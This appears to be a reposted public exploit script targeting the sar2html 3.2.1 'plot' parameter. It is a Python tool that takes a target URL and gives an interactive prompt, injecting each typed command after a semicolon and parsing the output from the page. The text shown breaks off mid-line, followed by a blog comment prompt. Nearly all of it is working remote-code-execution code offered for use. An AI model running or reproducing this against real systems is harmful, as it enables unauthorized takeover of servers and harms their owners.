# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution # Date: 27-12-2020 # Exploit Author: Musyoka Ian # Vendor Homepage:https://github.com/cemtan/sar2html # Software Link: https://sourceforge.net/projects/sar2html/ # Version: 3.2.1 # Tested on: Ubuntu 18.04.1 #!/usr/bin/env python3 import requests import re from cmd import Cmd url = input ( "Enter The url => " ) class Terminal ( Cmd ) : prompt = "Command => " def default ( self , args ) : exploiter ( args ) def exploiter ( cmd ) : global url sess = requests . session ( ) output = sess . get ( f "{url}/index.php?plot=;{cmd}" ) try : out = re . findall ( "<option value=(.*?)>" , output . text ) except : print ( "Error!!" ) for ouut in out : if "There is no defined host..." not in ouut : if "null selected" not i
Comentarios
Publicar un comentario